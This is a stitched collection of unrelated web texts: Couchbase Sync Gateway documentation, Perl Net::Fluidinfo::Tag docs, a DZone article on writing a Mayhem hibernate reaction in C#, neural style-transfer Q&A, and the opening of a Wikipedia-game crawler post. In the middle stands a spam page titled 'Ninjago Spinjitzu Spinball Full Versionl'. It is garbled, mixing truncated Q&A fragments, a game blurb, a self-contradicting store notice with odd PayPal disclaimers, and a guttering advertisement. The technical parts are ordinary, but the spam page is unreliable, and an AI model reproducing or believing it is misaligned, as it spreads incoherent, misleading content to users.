The all_channels property of a user account determines which channels the user can access. Its value is derived from the union of:
The user’s admin_channels property, which is settable via the admin REST API.
access() calls from sync functions invoked for current revisions of documents (see Programmatic Authorization).
The all_channels properties of all roles the user belongs to, which are themselves computed according to the above two rules.
The only documents a user can access are those whose current revisions are assigned to one or more channels the user has access to:
The _all_docs output is filtered to return only documents that are visible to the user.
The _changes feed is filtered the same way. In addition, when a user is granted access to a new channel, the feed incorporates the existing documents in that channel even if their sequence numbers are earlier than the client’s since parameter. That way the next client pull retrieves all documents to which the user now has access.
Walrus is a simple, limited, in-memory database that you can use in place of Couchbase Server for unit testing during development.
Use the following command to start a Sync Gateway that connects to a single Walrus database called sync_gateway and listens on the default ports:
$ sync_gateway -url walrus:
To use a different database name, use the -bucket option. For example:
$ sync_gateway -url walrus: -bucket mydb
By default, Walrus does not persist data to disk. However, you can make your database persistent by specifying an existing directory to which Sync Gateway can periodically save its state. It saves the data to a file named /<directory>/sync_gateway.walrus. For example, the following command instructs Sync Gateway to save the data in a file named /data/sync_gateway.walrus:
$ mkdir /data $ sync_gateway -url walrus:/data
You can use a relative path when specifying the directory for persistent data storage:
$ mkdir data $ sync_gateway -url walrus:data
You can also specify the directory for persistent data storage in a configuration file. The config.json file would look similar to the following JSON fragment:
{ "databases":{ "couchchat":{ "server":"walrus:data", ... } } }
To interact with Sync Gateway, you use the following APIs:
For information about controlling access to the REST APIs, see Administering the REST APIs.
The sync function is the core API you’ll be interacting with on the Sync Gateway. For simple applications it might be the only server-side code you need to write. For more complex applications it is still a primary touchpoint for managing data routing and access control.
For more information about using sync functions, read about channels and the description of the CouchChat data model.
If you don’t supply a sync function, Sync Gateway uses this as a default:
function (doc) { channel(doc.channels); }
The arguments enable the sync function to be used for validation as well as data routing. Your implementation can omit the oldDoc parameter if you do not need it (JavaScript ignores extra parameters passed to a function).
function (doc, oldDoc) { // your code here }
The sync function arguments are:
doc—The document that is being saved. This matches the JSON that was saved by the mobile client and replicated to Sync Gateway. No metadata or other fields are added, although the _id and _rev fields are available.
oldDoc—If the document has been saved before, the revision that is being replaced is available in this argument. In the case of a document with a conflicting revision, the provisional winning revision is passed in oldDoc. If the document is being deleted, there is a _deleted property whose value is true.
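The oldDoc argument is what makes validation possible. Here is a sketch of a sync function that makes an assumed "type" property immutable across revisions; the rule itself is an example, not something the gateway requires, and a no-op stand-in for the gateway-provided channel() callback is included so the sketch can run outside the gateway:

```javascript
// Stand-in for the gateway-provided channel() callback, for local testing.
function channel(name) { /* the real gateway routes the doc here */ }

function syncFunction(doc, oldDoc) {
  // oldDoc is null/undefined for brand-new documents.
  if (oldDoc && oldDoc.type !== doc.type) {
    // forbidden => HTTP 403 for an authenticated but unauthorized write
    throw ({forbidden: "the type property is immutable"});
  }
  channel(doc.channels);  // route accepted revisions as usual
}

// Accepted: a new document, and an update that keeps type intact.
syncFunction({type: "post", channels: ["public"]}, null);
syncFunction({type: "post", channels: ["public"]}, {type: "post"});
```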
From within the sync function you create changes in the Sync Gateway configuration via callback functions. Each call manages a small amount of configuration state. It is also tied back to the document which initiated the call, so that when the document is modified, any configuration made by an old version of the document is replaced with configuration derived from the newer version. Via these APIs, documents are mapped to channels. They can also grant access to channels, either to users or roles. Finally, you can reject an update completely by throwing an error. The error message will be returned to the synchronizing client, which will log it or potentially display it to the user.
throw()
The sync function can prevent a document from persisting or syncing to any other users by calling throw() with an error object. This also prevents the document from changing any other gateway configuration. Here is an example sync function that disallows all writes to the database it is in.
function (doc) { throw ({forbidden : "read only!"}) }
The key of the error object may be either forbidden (corresponding to an HTTP 403 error code) or unauthorized (corresponding to an HTTP 401 error code). The forbidden error should be used if the user is already authenticated and the account they are syncing with is not permitted to modify or create the document. The unauthorized error should be used if the account is not authenticated. Some user agents will trigger a login workflow when presented with a 401 error.
A quick rule of thumb: most of the time you should use the throw({forbidden : "your message here"}) statement, because most applications require users to be authenticated before any reads or writes can occur.
The channel call routes the document to the named channel. It accepts either a channel name string or an array of strings, if the document should be added to multiple channels in a single call. The channel function can be called zero or more times from the sync function, for any document. The default function (listed at the top of this document) routes documents to the channels listed on them. Here is an example that routes all “published” documents to the “public” channel.
function (doc, oldDoc) { if (doc.published) { channel ("public"); } }
As a convenience, it is legal to call channel with a null or undefined argument; it simply does nothing. This allows you to do something like channel(doc.channels) without having to first check whether doc.channels exists.
The access call grants access to a channel to a given user or list of users. It can be called multiple times from a sync function.
The effects of the access call last as long as this revision is current. If a new revision is saved, the access calls made by the sync function will replace the original access. If the document is deleted, the access is revoked. The effects of all access calls by all active documents are effectively unioned together, so if any document grants a user access to a channel, that user has access to the channel. Note that revoking access to a channel will not delete the documents which have already been synced to a user’s device.
The access call takes two arguments, the user (or users) and the channel (or channels). These are all valid ways to call it:
access ("jchris", "mtv") access ("jchris", ["mtv", "mtv2", "vh1"]) access (["snej", "jchris", "role:admin"], "vh1") access (["snej", "jchris"], ["mtv", "mtv2", "vh1"])
As a convenience, either argument may be null or undefined, in which case nothing happens.
Here is an example function that grants access to a channel for all the users listed on a document:
function (doc, oldDoc) { access (doc.members, doc.channel_name); // we should also put this document on the channel it manages channel (doc.channel_name) }
If a user name in an access call begins with the prefix role:, the rest of the name is interpreted as a role, not a user. The call then grants access to the channel(s) for all users with that role.
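The role: prefix convention can be illustrated with a small helper that splits a principal list into users and roles. The helper is hypothetical (Sync Gateway does this internally); only the role: prefix itself comes from the documentation:

```javascript
// Sketch: interpret the principal names passed to access(). Names with the
// "role:" prefix refer to roles; everything else is a user name.
function splitPrincipals(names) {
  const users = [], roles = [];
  for (const name of [].concat(names)) {  // accept a string or an array
    if (name.indexOf("role:") === 0) roles.push(name.slice(5));
    else users.push(name);
  }
  return { users: users, roles: roles };
}

console.log(splitPrincipals(["snej", "jchris", "role:admin"]));
// { users: [ 'snej', 'jchris' ], roles: [ 'admin' ] }
```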
The role call grants a user a role, indirectly giving them access to all channels granted to that role. It can also affect the user’s ability to revise documents, if the access function requires role membership to validate certain types of changes.
Its use is similar to access:
role(user_or_users, role_or_roles);
NOTE: Roles, like users, have to be explicitly created by an administrator. So unlike channels, which come into existence simply by being named, you can’t create new roles with a role() call. Nonexistent roles won’t cause an error, but have no effect on the user’s access privileges. (It is possible to create a role after the fact; as soon as it’s created, any pre-existing references to it take effect.)
You use the Sync REST API to synchronize a local database with a remote database. The sync takes place over HTTP and uses JSON documents in the message bodies. For more information about the synchronization protocol, see Replication Algorithm. You can also see the URL mappings in the Sync Gateway source code.
To access the Sync REST API, you need to have a user account.
You can use the following requests on the remote database. Replace db with the name of your database.
Push or Pull Requests:
Read the last checkpoint
GET /db/_local/checkpointid
Save a new checkpoint
PUT /db/_local/checkpointid
Push Requests:
Create remote database
PUT /db
Find revisions that are not known to the remote database
POST /db/_revs_diff
Upload revisions
POST /db/_bulk_docs
Upload a single document with attachments
PUT /db/docid?new_edits=false
Pull Requests:
Find changes since the last pull (feed can be normal or longpoll)
GET /db/_changes?style=all_docs&feed=feed&since=since&limit=limit&heartbeat=heartbeat
Download a single document with attachments
GET /db/docid?rev=revid&revs=true&attachments=true&atts_since=lastrev
Download first-generation revisions in bulk
POST /db/_all_docs?include_docs=true
The Admin REST API is a superset of the Sync REST API with the following major extensions:
By default, the Admin REST API runs on port 4985 (unless you change the adminInterface configuration parameter). Do not expose this port: it belongs behind your firewall. Anyone who can reach this port has free access to and control over your databases and user accounts.
PUT /$DB/ – Configures a new database. The body of the request contains the database configuration as a JSON object, the same as an entry in the databases property of a configuration file. Note that this doesn’t create a Couchbase Server bucket—you need to do that before configuring the database.
DELETE /$DB/ – Removes a database. It doesn’t delete the Couchbase Server bucket or any of its data, though, so you could bring the database back later with a PUT.
/$DB/_user/$name – Represents a user account. It supports GET, PUT, and DELETE, and you can also POST to /$DB/_user/. The body is a JSON object; for details, see the Authentication page. The special user name GUEST applies to unauthenticated requests.
/$DB/_role/$name – represents a role. This API is similar to users.
/$DB/_session – POST to this endpoint to create a logon session. The request body is a JSON object containing the username in the name property and the duration of the session (in seconds) in the ttl property. The response is a JSON object with properties session_id (the session cookie string), expires (the time the session expires), and cookie_name (the name of the HTTP cookie to set).
/_compact – Compacts a database by removing obsolete document bodies. Needs to be run occasionally.
/_profile – POST to this endpoint to enable Go CPU profiling, which can be useful for diagnosing performance problems. To start profiling, send a JSON body with a file property whose value is a path to write the profile to. To stop profiling, send a request without a file property.
A quick way to tell whether you’re talking to the Admin REST API is by sending a GET / request and checking whether the resulting object contains an "ADMIN": true property.
HTTP requests logged to the console show the user name of the requester after the URL. If the request is made on the admin port, this is “(ADMIN)” instead.
This section contains information about Sync Gateway deployments.
Sync Gateway has the following limitations:
It cannot operate on pre-existing Couchbase buckets with app data in them because Sync Gateway has its own document schema and needs to create and manage documents itself. You can migrate existing data by creating a new bucket for the gateway and then using the Sync REST API to move your documents into it via PUT requests. You can’t make changes to the Couchbase bucket directly. You have to go through the Sync Gateway API.
Explicit garbage collection is required to free up space, via a REST call to /$DB/_compact. Garbage collection is not scheduled automatically, so you have to call it yourself.
Document IDs longer than 180 characters overflow the Couchbase Server maximum key length and cause an HTTP error.
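Given the last limitation, a client might want to guard document IDs before issuing a PUT. This is an illustrative check based only on the 180-character limit stated above:

```javascript
// Sketch: guard against the documented 180-character document ID limit.
const MAX_DOC_ID_LENGTH = 180;

function isValidDocId(id) {
  return typeof id === "string" && id.length > 0 && id.length <= MAX_DOC_ID_LENGTH;
}

console.log(isValidDocId("user::jchris"));   // true
console.log(isValidDocId("x".repeat(181)));  // false
```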
Sync Gateway can be scaled up by running it as a cluster. This means running an identically configured instance of Sync Gateway on each of several machines, and load-balancing them by directing each incoming HTTP request to a random node. Sync Gateway nodes are “shared-nothing,” so they don’t need to coordinate any state or even know about each other. Everything they know is contained in the central Couchbase Server bucket.
All Sync Gateway nodes talk to the same Couchbase Server bucket. This can, of course, be hosted by a cluster of Couchbase Server nodes. Sync Gateway uses the standard Couchbase “smart-client” APIs and works with database clusters of any size.
Keep in mind the following notes on performance:
Sync Gateway nodes don’t keep any local state, so they don’t require any disk.
Sync Gateway nodes do not cache much in RAM. Every request is handled independently. The Go programming language does use garbage collection, so the memory usage might be somewhat higher than for C code. However, memory usage shouldn’t be excessive, provided the number of simultaneous requests per node is kept limited.
Go is good at multiprocessing. It uses lightweight threads and asynchronous I/O. Adding more CPU cores to a Sync Gateway node can speed it up.
As is typical with databases, writes are going to put a greater load on the system than reads. In particular, replication and channels imply that there’s a lot of fan-out, where making a change triggers sending notifications to many other clients, who then perform reads to get the new data.
We don’t currently have any guidelines for how many gateway or database nodes you might need for particular workloads. We’ll know more once we do more testing and tuning and get experience with real use cases.
Very large-scale deployments might run into challenges managing large numbers of simultaneous open TCP connections. The replication protocol uses a “hanging-GET” technique to enable the server to push change notifications. This means that an active client running a continuous pull replication always has an open TCP connection on the server. This is similar to other applications that use server-push, also known as “Comet” techniques, as well as protocols like XMPP and IMAP.
These sockets remain idle most of the time (unless documents are being modified at a very high rate), so the actual data traffic is low—the issue is just managing that many sockets. This is commonly known as the “C10k Problem” and it’s been pretty well analyzed in the last few years. Because Go uses asynchronous I/O, it’s capable of listening on large numbers of sockets provided that you make sure the OS is tuned accordingly and you’ve got enough network interfaces to provide a sufficiently large namespace of TCP port numbers per node.
The developers are hungry for feedback about Sync Gateway. If you run into any roadblocks, please let us know by filing an issue on one of our projects or via the mailing list. What seems insignificant to you may be hitting everyone but the core developers, so until you let us know, we can’t fix it.
In general, cURL, a command-line HTTP client, is your friend. You might also want to try HTTPie, a human-friendly command-line HTTP client. By using these tools, you can inspect databases and documents via the Sync Gateway REST API.
If you’re having trouble, feel free to ask for help on the mailing list. If you’re pretty sure you’ve found a bug, please file a bug report.
The Sync Gateway code is available on GitHub.
To build Sync Gateway from source, you must have Go 1.2 or later installed on your computer.
On Mac or Unix systems, you can build Sync Gateway from source as follows:
Open a terminal window and change to the directory that you want to store Sync Gateway in.
Clone the Sync Gateway GitHub repository:
$ git clone
Change to the sync_gateway directory:
$ cd sync_gateway
Set up the submodules:
$ git submodule init
$ git submodule update
Build Sync Gateway:
$ ./build.sh
Sync Gateway is a standalone, native executable located in the ./bin directory. You can run the executable from the build location or move it anywhere you want.
To update your build later, pull the latest updates from GitHub, update the submodules, and run
./build.sh again.
This is the third Beta release.
We’ve made some major changes since Beta 2 to make Sync Gateway more performant and scalable, and to help it co-exist better with Couchbase Server. Features introduced in Beta 3 include the following:
Bucket shadowing We have designed a co-existence path with Couchbase Server web clients using a workflow dubbed “bucket shadowing”: a Couchbase Server managed bucket and a Sync Gateway compatible bucket “shadow” each other. The Couchbase Server bucket can continue to be managed using regular Couchbase Server APIs. If you’re already using Couchbase Server and want to make your existing data available to Couchbase Lite mobile clients, this is the recommended approach. More information can be found here.
New Configuration Properties Properties have been added to increase flexibility for compression, the maximum number of open file descriptors allowed, and support for bucket shadowing. They are as follows:
compressResponses: Set this to false to disable GZip compression of HTTP responses, if your gateway is behind a proxy server that applies its own compression.
maxFileDescriptors: The maximum number of open file descriptors/sockets. The gateway calls setrlimit at startup time to request 5000 file descriptors, but if you need more (which is likely for heavily loaded servers) you can set this property to request a higher number.
shadow: Configures bucket shadowing.
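Pulling those properties together, a configuration sketch might look like the following. The nesting (top-level versus per-database), the server URL, and the bucket names are assumptions for illustration only, and exact placement may differ between releases; check the configuration reference for your version:

```json
{
  "compressResponses": false,
  "maxFileDescriptors": 25000,
  "databases": {
    "db": {
      "server": "http://localhost:8091",
      "bucket": "sync_gateway",
      "shadow": {
        "server": "http://localhost:8091",
        "bucket": "app-data"
      }
    }
  }
}
```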
Admin API Enhancements We’ve added a number of Admin enhancements that include:
GET /db/_config.
GET /_expvar will return a (large) JSON response containing a lot of internal statistics about the gateway. We use this internally for performance testing but it could be useful to you too. See the expvars page for details.
Performance Enhancements We’ve added support for GZip-compressed HTTP requests and responses, the WebSocket protocol for the continuous _changes feed, and in-memory caching of recently requested document bodies as well as change history.
Some fixes to highlight in this release:
Replication support
Changes feed
Correctly assign document channels when importing existing docs from a Couchbase bucket or after changing the sync function.
GET /db no longer includes a doc_count property. It’s quite expensive to count the number of documents in a Couchbase bucket. This URL gets accessed at the beginning of every replication, so the overhead of including doc_count was significant, even though it appears to be unused.
This is the second Beta release.
The primary focus of the second Beta release for Sync Gateway has been performance enhancement, horizontal scaling, and increased stability.
Overall performance fixes to improve product usability.
Authentication
Web Client Support
Attachment Support
Higher ulimit
Installation
Rebalance support
This is the first Beta release.
Dynamic sync capabilities via Sync Function APIs—Apps can begin to automatically sync data from the cloud without any manual setup by using Couchbase sync functions.
Easy Administration—Manage Sync Gateway via the Admin REST API when you need to.
Seamless scale-out—Easily scale your Sync Gateway tier as your application needs grow.
None.
We are currently working on performance tuning and are aware of issues when Sync Gateway is scaled. If you run into a performance issue, please let us know.
Source: http://docs.couchbase.com/sync-gateway/
Ninjago Spinjitzu Spinball Full Versionl
Q:
Why was the incorrect spelling given for the “almost exact duplicate” in the DBA.stackexchange database?
The question linked above gets a list of “duplicates” from a vote. One of the reasons they gave was as follows
I feel that this question is almost exact duplicate of the following question
I see the following
The following question is a dupe of the one linked above
But the following is not a dupe
I don’t see why that is a dupe, and I can’t mark my own question as a dupe. Did I get an error? Am I doing something wrong?
A:
I have no idea, but perhaps at some point in the 1.5 years this has been in the system (post-mortem), a user input an incorrect reason for a duplicate. That may have happened several times, and then a request for dbq munging was made to sort it all out.
Q:
R: Multiple Plot Calls in an R Script
My script was working fine until I changed from 3 lines to 4. This is the script I’m working on:
A game based on the Lego Ninjago Spinjitzu Spinball toy, but with a nice storyline. Ninjago Spinjitzu Spinball is a match-3 puzzle game developed by Paradoxon Games and published by Vostu Games. The game was released on August 15, 2017, for Android and iOS. The game follows the storyline of the spinjitzu spinball toy.
Q:
How can I generate a URL when using ASP.NET’s Routing?
I’m trying to generate a custom URL when using ASP.NET’s Routing.
For example:
This obviously contains the UserId and a DestinationId.
I would like to replace this with:
Is it possible?
Cheers.
EDIT: here is my RouteConfig.cs, in case it is useful:
public class RouteConfig
{
public static void RegisterRoutes(RouteCollection routes)
{
routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
routes.MapRoute(
name: "Default",
url: "{controller}/{action}/{id}",
defaults: new { controller = "Home", action = "Index", id = UrlParameter.Optional }
);
}
}
A:
You can do that by changing the URL definition in the RouteConfig.cs as following:
public class RouteConfig
{
public static void RegisterRoutes(RouteCollection routes)
{
routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
routes.MapRoute(
name: "Default",
url: "{action}/{id}",
defaults: new
All you have to do is input a valid discount code at the end of the purchase, no tools required. This is our corporate store and is protected by a password. It has never been easier to purchase products in the United States and Canada. Mastercard, Visa, RBC, EBT, employee discount, VISA, Debit, Gift Card, Reward, and ALL other COD’s.
Tools are required for this type of service. Thank you.
PayPal is a registered trademark of PayPal, Inc., and its affiliated companies. Certain emails associated with AssistMyApp.com are owned, controlled or licensed by PayPal, and are not affiliated with the site.
All products are sold under our own inventory, and are not direct purchases from the vendor.
For ordering questions or concerns, please contact us on our shop contact page.
International customers please note, COD orders will take much longer, and may be subject to customs delays or restrictive trade practices. Do not purchase domestic COD orders if you can help it.
Visit our shop, assistmyapp.com, and use our secure shopping cart.
Top navigation links
Use our search tool to find and select products to purchase.
Log in to enjoy all of our great savings.
In your cart, you may view the items that are in stock.
Enter your PayPal email address to access your virtual shopping cart.
Click “SEND” to pay securely for the products in your cart.
AssistMyApp.com will handle your PayPal transaction and email order confirmation.
Rubbish Removal Christchurch
Guttering Cleaning & Repairs
Christchurch, New Zealand
Roofline is the number one rated home renovation company in Christchurch. Our ability to provide a prompt, reliable and friendly service is why we have such a strong reputation in Christchurch and southern New Zealand. As a family owned business our team of fully trained tradesmen work with you, your budget and your home to give you the perfect solution for your Christchurch guttering issues.
Roofline
Source: https://ibipti.com/ninjago-spinjitzu-spinball-full-_best_-versionl/
Net::Fluidinfo::Tag - Fluidinfo tags
use Net::Fluidinfo::Tag;

# create
$tag = Net::Fluidinfo::Tag->new(
    fin         => $fin,
    description => $description,
    indexed     => 1,
    path        => $path
);
$tag->create;

# get, optionally fetching description
$tag = Net::Fluidinfo::Tag->get($fin, $path, description => 1);
$tag->namespace;

# update
$tag->description($new_description);
$tag->update;

# delete
$tag->delete;
Net::Fluidinfo::Tag models Fluidinfo tags.
Net::Fluidinfo::Tag is a subclass of Net::Fluidinfo::Base.
Net::Fluidinfo::Tag consumes the roles Net::Fluidinfo::HasObject, and Net::Fluidinfo::HasPath.
Constructs a new tag. The constructor accepts these parameters:
An instance of Net::Fluidinfo.
A description of this tag.
A flag that tells Fluidinfo whether this tag should be indexed. This attribute mirrors the Fluidinfo API, but please note that Fluidinfo currently ignores its value; nowadays all tags are indexed.
The namespace you want to put this tag into. An instance of Net::Fluidinfo::Namespace representing an existing namespace in Fluidinfo.
The name of the tag, which is the rightmost segment of its path. The name of "fxn/rating" is "rating".
The path of the tag, for example "fxn/rating".
The description attribute is not required because Fluidinfo allows fetching tags without their description. It must be defined when creating or updating tags though.
The attributes namespace, path, and name are mutually dependent. Ultimately tag creation has to be able to send the path of the namespace and the name of the tag to Fluidinfo. So you can set namespace and name, or just path.
This constructor is only useful for creating new tags in Fluidinfo. Existing tags are fetched with get.
Retrieves the tag with path $path from Fluidinfo. Options are:

description: tells get whether you want to fetch the description.
Net::Fluidinfo provides a convenience shortcut for this method.
Determines whether $path1 and $path2 are the same in Fluidinfo. The basic rule is that the username fragment is case-insensitive, and the rest is not.
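The comparison rule can be sketched outside Perl as well. This Python version illustrates the rule only; the function name and the split-on-first-slash behaviour are assumptions for illustration, not part of the module's API:

```python
def paths_equal(path1, path2):
    """Fluidinfo-style path comparison: the leading username segment
    is case-insensitive, the remainder is case-sensitive."""
    user1, _, rest1 = path1.partition("/")
    user2, _, rest2 = path2.partition("/")
    return user1.lower() == user2.lower() and rest1 == rest2

paths_equal("FXN/rating", "fxn/rating")   # True: usernames differ only in case
paths_equal("fxn/Rating", "fxn/rating")   # False: the tag name is case-sensitive
```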
Creates the tag in Fluidinfo. Please note that tags are created on the fly by Fluidinfo if they do not exist.
Creating a tag by hand may be useful for example if you want to change the inherited permissions right away. That may be interesting if you are going to store sensitive data that would be by default readable. Other than that, it is recommended that you let Fluidinfo create tags as needed.
Updates the tag in Fluidinfo. Only the description can be modified.
Deletes the tag in Fluidinfo.
Gets/sets the description of the tag.
Note that you need to set the description flag when you fetch a tag for this attribute to be initialized.
A flag that indicates whether this tag is indexed in Fluidinfo.

This predicate mirrors the Fluidinfo API. Nowadays all tags are indexed, so this predicate always returns true.
The namespace the tag belongs to, as an instance of Net::Fluidinfo::Namespace. This attribute is lazy loaded.
The name of the tag.
The path of the tag.
Xavier Noria (FXN), <fxn@cpan.org>
This program is free software; you can redistribute it and/or modify it under the terms of either: the GNU General Public License as published by the Free Software Foundation; or the Artistic License.
See for more information.
Source: http://search.cpan.org/dist/Net-Fluidinfo/lib/Net/Fluidinfo/Tag.pm
Connect Anything with Mayhem
Now, what makes Mayhem so cool is that you can simply select an event, connect it to a reaction, and turn it on, without any code, and there you are! An Event can be an email alert, someone posting on your Facebook wall, a stock or weather alert, an input from your mobile phone, a speech recognition command, or anything else you could dream of. A Reaction is what happens when an event occurs: a reaction can be a phone call, running a program, scheduling an appointment with a doctor, turning on your TV set, starting your web camera, and the list goes on. You are responsible for connecting an event to a reaction and then turning it on. The beauty of it is that you don't have to be a programmer or have a computer science degree to do that.
You can download the mayhem application from Codeplex and install it, then you are good to go. After the installation, if you run the application, you should see an interface like this.
You can click on Choose Event to select any event you want, there are some basic events that you can choose from as you can see below, if you click on Choose Reaction, it will equally bring out a dialog box containing the list of Reactions.
You can now select any event and associate a reaction with it. If I want to open Safari any time I pronounce the word "Browser", I simply select Speech Recognition from the Event list, type browser into the Listen for Phrase textbox, and click OK. Then I associate a Reaction with it by selecting Run Program from the Reaction list; a dialog box prompts me to navigate to the program to be run, where I select the Safari application file from the Safari folder in the Program Files folder. The last thing to do is to turn it on, and that is it. Any time I pronounce the word browser, my system will open Safari.
The coolest thing about Mayhem is that you can extend it, you as a programmer or developer can write your own reaction or event and deploy it as a module into your Mayhem installation, and if your module is good enough and you want others to use it, you can submit it to the Outercurve foundation for review and acceptance.
Would it not be nice if I want to go out and simply tell my computer system to hibernate, without me touching it? I would demonstrate the power of Mayhem by writing a Reaction that will hibernate the system, so that anytime I say "hibernate", my computer will hibernate.
Before you can start writing modules for Mayhem, you need to set up Visual Studio. If you have not installed NuGet, you need to do that; this article here will show you how to install NuGet. After the NuGet installation has been done, you need to install the Mayhem packages. This can be done by selecting Library Package Manager from the Tools menu in Visual Studio and then selecting Package Manager Settings. In the dialog box that will be displayed, click Package Source, type Mayhem Package in the name textbox, fill in the source textbox, and click OK.
Create a new C# class library project and give it the name Mayhem.Hibernator or any name you like. In the project's solution explorer, right click References and select Manage Nuget Package. This will bring a new dialog box, click the Online tab and select Mayhem Packages, this will bring a number of Mayhem packages, select and install MayhemCore.
Add a new class to the class library project and name it Hibernator. You need to add a reference to MayhemCore so as to be able to access the Mayhem base classes and other functionality. Since the module will be a reaction, the class must extend the ReactionBase class so that the Perform method can be overridden. The class must be decorated with the DataContract attribute, which is found in the System.Runtime.Serialization namespace, and the MayhemModule attribute contained in MayhemCore. The MayhemModule attribute has two parameters: the name and description of the reaction.
using System.Runtime.Serialization;
using MayhemCore;
using System;

namespace Mayhem.Hibernator
{
    [DataContract]
    [MayhemModule("Hibernator", "this reaction hibernates the system")]
    public class Hibernator : ReactionBase
    {
        public override void Perform()
        {
            System.Diagnostics.Process.Start("shutdown", "-h");
        }
    }
}
The code that will be executed when the reaction is called is placed in the Perform method. After the code has been written, you can build the class library project. The output of the class library project, a dll file, can now be copied into "C:\Program Files\Outercurve\Mayhem\DefaultModules.1.0.0\lib\net40", depending on where your Mayhem installation is. Restart the Mayhem application and click Choose Reaction; you will see that Hibernator has been added to the Reaction list.
You can now connect any Event of your choice to this Reaction. In this case I associate a Speech Recognition Event with the Reaction so that any time I say hibernate, the system will hibernate itself.
This is a simple demonstration of Mayhem. You can use Mayhem to do virtually anything you can dream of!
Source: https://dzone.com/articles/connect-anything-mayhem
Hot questions for Using Neural networks in style transfer
Question:
I'm just getting started with these topics. To the best of my knowledge, style transfer takes the content from one image and the style from another, to generate or recreate the first in the style of the second, whereas a GAN generates completely new images based on a training set.

But I see a lot of places where the two have been used interchangeably, like this blog here, and other places where GAN is used to achieve style transfer, like this paper here.

Are GAN and style transfer two different things, or is GAN the method to implement style transfer, or are they both different things that do the same thing? Where exactly is the line between the two?
Answer:
GAN is a neural network architecture.

Style transfer is a (set of) processing methods (which can be as simple as grayscale or blur).

So the relation is: GAN can be used to implement style transfer (and other things).

To make it more complicated (hopefully this can make something clearer): if you think of the feature vector as the style of an image, then feature vector -> image conversion is a style transfer :)
Question:
I've been going through Chollet's Deep Learning with Python, where he briefly covers L2-normalization with regards to Keras. I understand that it prevents overfitting by adding a penalty proportionate to the sum of the square of the weights to the cost function of the layer, helping to keep weights small.
However, in the section covering artistic style transfer, the content loss as a measure is described as:
the L2 norm between the activations of an upper layer in a pretrained convnet, computed over the target image, and the activations of the same layer computed over the generated image. This guarantees that, as seen from the upper layer, the generated image will look similar.
The style loss is also related to the L2-norm, but let's focus on the content loss for now.
So, the relevant code snippet (p.292):
def content_loss(base, combination):
    return K.sum(K.square(combination - base))

outputs_dict = dict([(layer.name, layer.output) for layer in model.layers])

content_layer = 'block5_conv2'
style_layers = ['block1_conv1', 'block2_conv1', 'block3_conv1',
                'block4_conv1', 'block5_conv1']

total_variation_weight = 1e-4
style_weight = 1.
content_weight = 0.025

# K here refers to the Keras backend
loss = K.variable(0.)
layer_features = outputs_dict[content_layer]
target_image_features = layer_features[0, :, :, :]
combination_features = layer_features[2, :, :, :]
loss += content_weight * content_loss(target_image_features,
                                      combination_features)
I don't understand why we use the outputs of each layer, which are image feature maps, as opposed to Keras's get_weights() method to fetch the weights to perform normalization. I do not follow how using L2-normalization on these feature maps penalizes during training, or moreover what exactly it is penalizing.
Answer:
I understand that it prevents overfitting by adding a penalty proportionate to the sum of the square of the weights to the cost function of the layer, helping to keep weights small.
What you are referring to is (weight) regularization, and in this case it is L2-regularization. The (squared) L2-norm of a vector is the sum of the squares of its elements, and therefore when you apply L2-regularization on the weights (i.e. parameters) of a layer it would be considered (i.e. added) in the loss function. Since we are minimizing the loss function, the side effect is that the L2-norm of the weights will be reduced as well, which in turn means that the value of the weights has been reduced (i.e. small weights).
However, in the style transfer example the content loss is defined as the L2-norm (or L2-loss in this case) of the difference between the activations (and not weights) of a specific layer (i.e. content_layer) when applied on the target image and the combination image (i.e. target image + style):

return K.sum(K.square(combination - base)) # that's exactly the definition of L2-norm

So no weight regularization is involved here. Rather, the loss function used is the L2-norm and it is used as a measure of similarity of two arrays (i.e. activations of the content layer). The smaller the L2-norm, the more similar the activations.
Why activations of the layer and not its weights? Because we want to make sure that the contents (i.e. representations given by the content_layer) of the target image and the combination image are similar. Note that the weights of a layer are fixed and do not change (after training, of course) with respect to an input image; rather, they are used to describe or represent a specific input image, and that representation is called the activations of that layer for that specific image.
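As a standalone illustration of that loss, here is a NumPy sketch (not the book's Keras code; the shapes and values are made up):

```python
import numpy as np

def content_loss(base, combination):
    # L2 loss: sum of squared element-wise differences between
    # two activation maps of the same shape
    return np.sum(np.square(combination - base))

base = np.zeros((2, 2))
combination = np.ones((2, 2))
content_loss(base, combination)  # 4.0: four elements, each differing by 1
```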
Question:
I'm studying style-transfer networks and right now working with this work; here is the network description. The problem is that even with adding TV loss there is still visible noise which is breaking the quality of the result. Can someone recommend some articles on ways of removing such noise during network training?
Thanks
Answer:
The deconvolution noise is because of the uneven overlaps between the input and the kernel, which creates a checkerboard-like pattern of varying magnitudes. One fix is to use the resize-conv method as mentioned in this article.

Resize-conv replaces transpose convolution with image scaling followed by a 2D convolution. In TensorFlow, the 2 steps are: tf.image.resize_images(...) and tf.nn.conv2d(...). Another tip from the authors is to call tf.pad(...) prior to the convolution method and only use the Nearest Neighbour resize method.
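A minimal NumPy sketch of the resize-conv idea (nearest-neighbour upscale, then an ordinary "valid" convolution); it illustrates the technique only and is not the TensorFlow code the answer refers to:

```python
import numpy as np

def resize_conv(x, kernel, scale=2):
    # 1) nearest-neighbour upscale: every output pixel is covered by the
    #    kernel evenly, avoiding the transpose-convolution checkerboard
    up = np.repeat(np.repeat(x, scale, axis=0), scale, axis=1)
    # 2) plain "valid" 2D convolution (written here as cross-correlation)
    kh, kw = kernel.shape
    out = np.zeros((up.shape[0] - kh + 1, up.shape[1] - kw + 1))
    for i in range(out.shape[0]):
        for j in range(out.shape[1]):
            out[i, j] = np.sum(up[i:i + kh, j:j + kw] * kernel)
    return out

x = np.array([[1.0, 2.0], [3.0, 4.0]])
out = resize_conv(x, np.ones((2, 2)))
out.shape  # (3, 3)
```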
Question:
I have a set of around 60 fractals (e.g
And a set of 60 snacks (e.g
And I want to apply the style of the fractal on the snack.
Is this possible? Or must I specifically take images from an existing data set with a pre-trained image model?
Thanks
Answer:
It depends on whether the method involves training a model on style data or not.

At least one method does not require that at all, instead training a network on a classification task and then inferring the style of an image during the style transfer. So you can use a model that has been pre-trained on images that you do not have, and then use it and your images to perform the style transfers.

There is some ready-to-use code to do that: example
Source: https://thetopsites.net/projects/neural-network/style-transfer.shtml
I am making a Python web-crawler program to play The Wiki game.
If you're unfamiliar with this game:
- Start from some article on Wikipedia
- Pick a goal article
- Try to get to the goal article from the start article just by clicking wiki/ links
My process for doing this is:
- Take a start article and a goal article as input
- Get a list of articles that link to the goal article
- Perform a breadth-first search on the links found, avoiding pages that have already been visited, starting from the start article
